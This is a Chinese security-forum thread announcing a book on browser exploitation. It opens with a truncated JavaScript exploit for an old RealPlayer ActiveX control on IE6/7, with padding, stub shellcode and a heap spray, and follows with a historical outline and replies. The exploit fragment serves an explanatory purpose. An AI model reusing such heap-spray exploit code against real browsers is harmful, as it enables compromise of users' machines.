[原创]浏览器漏洞攻防对抗的艺术-<恭喜泉哥完成新书编写>-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]浏览器漏洞攻防对抗的艺术-<恭喜泉哥完成新书编写>

发表于: 2016-6-28 09:47 15003

[原创]浏览器漏洞攻防对抗的艺术-<恭喜泉哥完成新书编写>

仙果

2016-6-28 09:47

15003

<script>
2....
3.var user = navigator.userAgent.toLowerCase();
4.//判断是否是IE6或IE7浏览器
5.if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
6. return;
7.if(user.indexOf("nt 5.")==-1)
8. return;
9.VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
10.
11....
12.else if(RealVersion.indexOf("6.0.14.") != -1)
13.{
14. for(i=0;i<10;i++)
15. Padding = Padding + JmpOver;
16. Padding = Padding + ret;
17.}
18.AdjESP = "LLLL\\XXXXXLD";
19.
20.Shell = "TYIIIIIIIIIIIIIIII7Q.....";
21.PayLoad = Padding + AdjESP + Shell;
22.while(PayLoad.length < 0x8000)
23. PayLoad += "YuanGe"; // ?~??~-.=! //暴力堆填充和ShellCode
24.Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
25.}
26.RealExploit();")//触发漏洞
27.</script>

DirectX的DirectShow组件（quartz.dll）在解析畸形的QuickTime媒体文件时存在错误，用户受骗打开了恶意的媒体文件就会导致执行任意代码。由于用户可能在浏览器中安装媒体播放插件，因此访问恶意网页就足以导致播放QuickTime文件，触发Quartz.dll中的漏洞。
来看具体的漏洞利用代码：通过暴力填充来加载.net 模块，目的是内存占位，方便进行漏洞利用。

堆填充的长度有0x80000字节的长度，占了非常大的内存，虽然说能够达到漏洞利用的目的，但是给人的感觉确实非常的暴力和直接，用户会察觉到浏览器有非常大的卡顿现象。

攻击方

防御方

中立方

2008年及以前：浏览器漏洞利用的野蛮生长

2009-2010年：Win7攻防和ASLR的陷落

CVE-2010-3654：ASLR的陷落

2011-2012年:Java漏洞大行其道和Flash 漏洞加密技术大发展

2013-2014年：IE浏览器UAF漏洞的井喷之势

2015年未完成：GOD天人模式及Flash漏洞利用新趋势

登录后可查看完整内容

[招生]科锐逆向工程师培训(2025年3月11日实地，远程教学同时开班, 第52期)！

上传的附件：

1446781126616.png （48.03kb，14次下载）
1446799028786.png （175.40kb，10次下载）
1446823342162.png （275.38kb，13次下载）
1446823675682.png （100.82kb，6次下载）
1446823792567.png （81.82kb，7次下载）
1446824769528.png （62.31kb，6次下载）
1446824780708.png （47.46kb，8次下载）
1446824917602.png （38.91kb，6次下载）
1446825373270.png （111.70kb，8次下载）
1446826267861.png （64.49kb，10次下载）
1446826686012.png （16.83kb，6次下载）
1446826690093.png （105.47kb，7次下载）
1446826693068.png （63.36kb，7次下载）
1446827243545.png （52.45kb，5次下载）
1446827354954.png （136.31kb，6次下载）
1446827389212.png （55.61kb，6次下载）
1446828257219.png （86.60kb，6次下载）
1446828570916.png （78.71kb，11次下载）
1446828783308.png （82.50kb，9次下载）
1446829673074.png （36.98kb，8次下载）
1446829934375.png （33.31kb，8次下载）
1446829941718.png （77.51kb，8次下载）
1446830232419.png （126.81kb，5次下载）
1446830441190.png （113.17kb，5次下载）
浏览器漏洞攻防对抗的艺术.pdf （2.17MB，566次下载）

收藏・29

免费・3

支持

最新回复 (23)
狗毛大圣雪币： 421 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 72 粉丝 0 关注私信	狗毛大圣 2 楼前排支持 2016-6-28 09:50 0
靴子雪币： 22 活跃值： (473) 能力值： ( LV2，RANK：10 ) 在线值：发帖 19 回帖 526 粉丝 1 关注私信	靴子 3 楼恭喜~恭喜~恭喜~ 2016-6-28 10:15 0
elianmeng 雪币： 967 活跃值： (1138) 能力值： ( LV6，RANK：90 ) 在线值：发帖 68 回帖 707 粉丝 4 关注私信	elianmeng 1 4 楼问一下楼主你截图的工具不错啊关键地方清楚其他地方模糊 ,请问这个是什么工具? 2016-6-28 10:28 0
Tennn 雪币： 1176 活跃值： (1269) 能力值： ( LV12，RANK：380 ) 在线值：发帖 38 回帖 711 粉丝 64 关注私信	Tennn 5 5 楼支持~~~~~~~ 2016-6-28 13:11 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 68 关注私信	仙果 19 6 楼 WinSnap 非常小的一个工具 2016-6-28 14:22 0
Keoyo 雪币： 292 活跃值： (850) 能力值： ( LV6，RANK：90 ) 在线值：发帖 9 回帖 219 粉丝 20 关注私信	Keoyo 2 7 楼很期待泉哥的作品，《0day2》后又一值得期待的书！ 2016-6-28 15:09 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 8 楼好文，前排支持。同时期待泉哥新书 2016-6-28 15:41 0
谢逅雪币： 92 活跃值： (209) 能力值： ( LV6，RANK：95 ) 在线值：发帖 6 回帖 90 粉丝 0 关注私信	谢逅 2 9 楼请问什么书，在哪首发啊。 2016-6-29 10:28 0
JAYceMS 雪币： 6952 活跃值： (4111) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 68 粉丝 0 关注私信	JAYceMS 10 楼好贴, 说到了很多技术 .. 新书是啥来着 2016-6-29 10:51 0
幽暗雪币： 2749 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 10 粉丝 0 关注私信	幽暗 11 楼流弊，必须入手。 2016-6-29 23:44 0
hackyzh 雪币： 1746 活跃值： (252) 能力值： ( LV9，RANK：210 ) 在线值：发帖 20 回帖 102 粉丝 11 关注私信	hackyzh 3 12 楼好书必须顶 2016-6-30 08:38 0
陈林00007 雪币： 2067 活跃值： (1767) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 132 粉丝 1 关注私信	陈林00007 13 楼期待新书，什么时间问世 2016-6-30 10:08 0
MsScotch 雪币： 3328 活跃值： (2116) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 340 粉丝 3 关注私信	MsScotch 14 楼好文书名？ 2016-6-30 10:35 0
byebing 雪币： 266 活跃值： (44) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 170 粉丝 0 关注私信	byebing 15 楼 mark—— 2016-6-30 20:39 0
linso 雪币： 349 活跃值： (125) 能力值： ( LV7，RANK：100 ) 在线值：发帖 9 回帖 84 粉丝 3 关注私信	linso 1 16 楼这个写的好啊，正需要。感谢果牛撒 2016-7-1 14:49 0
Protected 雪币： 6804 活跃值： (1299) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 346 粉丝 1 关注私信	Protected 17 楼 mark-- 2016-7-1 15:50 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 18 楼《漏洞战争》976K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6W2K9h3u0G2i4K6u0W2j5$3!0E0i4K6u0r3N6s2c8S2M7Y4c8A6j5$3I4W2i4K6u0r3M7q4)9J5c8Y4y4Z5L8%4N6Q4x3@1k6A6k6q4)9K6c8o6t1K6x3o6V1@1x3o6x3&6z5e0p5$3y4U0M7^5y4U0f1%4x3o6p5&6z5e0f1`. 2016-7-1 16:27 0
Concord 雪币： 27 活跃值： (627) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 134 粉丝 1 关注私信	Concord 19 楼支持学习了 2016-7-2 01:18 0
riusksk 雪币： 433 活跃值： (1885) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 262 关注私信	riusksk 41 20 楼感谢仙果，新书介绍见这里：http://bbs.pediy.com/showthread.php?t=211344 2016-7-2 13:45 0
LDBQH 雪币： 50 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	LDBQH 21 楼泉哥的书要支持 2016-8-10 09:08 0
PowerZhai 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	PowerZhai 22 楼 look look 2016-8-27 14:22 0
smallfishl 雪币： 24 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 35 粉丝 0 关注私信	smallfishl 23 楼期待新书，什么时间问世 2016-10-9 14:32 0
@半亩方塘雪币： 1285 活跃值： (231) 能力值： ( LV2，RANK：15 ) 在线值：发帖 2 回帖 8 粉丝 0 关注私信	@半亩方塘 24 楼最后那个漏洞是CVE-2014-6332还是CVE-2015-6332，是写错了吧 2020-8-25 11:12 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

仙果

发帖

1507

回帖

860

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (23)
狗毛大圣雪币： 421 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 72 粉丝 0 关注私信	狗毛大圣 2 楼前排支持 2016-6-28 09:50 0
靴子雪币： 22 活跃值： (473) 能力值： ( LV2，RANK：10 ) 在线值：发帖 19 回帖 526 粉丝 1 关注私信	靴子 3 楼恭喜~恭喜~恭喜~ 2016-6-28 10:15 0
elianmeng 雪币： 967 活跃值： (1138) 能力值： ( LV6，RANK：90 ) 在线值：发帖 68 回帖 707 粉丝 4 关注私信	elianmeng 1 4 楼问一下楼主你截图的工具不错啊关键地方清楚其他地方模糊 ,请问这个是什么工具? 2016-6-28 10:28 0
Tennn 雪币： 1176 活跃值： (1269) 能力值： ( LV12，RANK：380 ) 在线值：发帖 38 回帖 711 粉丝 64 关注私信	Tennn 5 5 楼支持~~~~~~~ 2016-6-28 13:11 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 68 关注私信	仙果 19 6 楼 WinSnap 非常小的一个工具 2016-6-28 14:22 0
Keoyo 雪币： 292 活跃值： (850) 能力值： ( LV6，RANK：90 ) 在线值：发帖 9 回帖 219 粉丝 20 关注私信	Keoyo 2 7 楼很期待泉哥的作品，《0day2》后又一值得期待的书！ 2016-6-28 15:09 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 8 楼好文，前排支持。同时期待泉哥新书 2016-6-28 15:41 0
谢逅雪币： 92 活跃值： (209) 能力值： ( LV6，RANK：95 ) 在线值：发帖 6 回帖 90 粉丝 0 关注私信	谢逅 2 9 楼请问什么书，在哪首发啊。 2016-6-29 10:28 0
JAYceMS 雪币： 6952 活跃值： (4111) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 68 粉丝 0 关注私信	JAYceMS 10 楼好贴, 说到了很多技术 .. 新书是啥来着 2016-6-29 10:51 0
幽暗雪币： 2749 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 10 粉丝 0 关注私信	幽暗 11 楼流弊，必须入手。 2016-6-29 23:44 0
hackyzh 雪币： 1746 活跃值： (252) 能力值： ( LV9，RANK：210 ) 在线值：发帖 20 回帖 102 粉丝 11 关注私信	hackyzh 3 12 楼好书必须顶 2016-6-30 08:38 0
陈林00007 雪币： 2067 活跃值： (1767) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 132 粉丝 1 关注私信	陈林00007 13 楼期待新书，什么时间问世 2016-6-30 10:08 0
MsScotch 雪币： 3328 活跃值： (2116) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 340 粉丝 3 关注私信	MsScotch 14 楼好文书名？ 2016-6-30 10:35 0
byebing 雪币： 266 活跃值： (44) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 170 粉丝 0 关注私信	byebing 15 楼 mark—— 2016-6-30 20:39 0
linso 雪币： 349 活跃值： (125) 能力值： ( LV7，RANK：100 ) 在线值：发帖 9 回帖 84 粉丝 3 关注私信	linso 1 16 楼这个写的好啊，正需要。感谢果牛撒 2016-7-1 14:49 0
Protected 雪币： 6804 活跃值： (1299) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 346 粉丝 1 关注私信	Protected 17 楼 mark-- 2016-7-1 15:50 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 18 楼《漏洞战争》976K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6W2K9h3u0G2i4K6u0W2j5$3!0E0i4K6u0r3N6s2c8S2M7Y4c8A6j5$3I4W2i4K6u0r3M7q4)9J5c8Y4y4Z5L8%4N6Q4x3@1k6A6k6q4)9K6c8o6t1K6x3o6V1@1x3o6x3&6z5e0p5$3y4U0M7^5y4U0f1%4x3o6p5&6z5e0f1`. 2016-7-1 16:27 0
Concord 雪币： 27 活跃值： (627) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 134 粉丝 1 关注私信	Concord 19 楼支持学习了 2016-7-2 01:18 0
riusksk 雪币： 433 活跃值： (1885) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 262 关注私信	riusksk 41 20 楼感谢仙果，新书介绍见这里：http://bbs.pediy.com/showthread.php?t=211344 2016-7-2 13:45 0
LDBQH 雪币： 50 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	LDBQH 21 楼泉哥的书要支持 2016-8-10 09:08 0
PowerZhai 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	PowerZhai 22 楼 look look 2016-8-27 14:22 0
smallfishl 雪币： 24 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 35 粉丝 0 关注私信	smallfishl 23 楼期待新书，什么时间问世 2016-10-9 14:32 0
@半亩方塘雪币： 1285 活跃值： (231) 能力值： ( LV2，RANK：15 ) 在线值：发帖 2 回帖 8 粉丝 0 关注私信	@半亩方塘 24 楼最后那个漏洞是CVE-2014-6332还是CVE-2015-6332，是写错了吧 2020-8-25 11:12 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复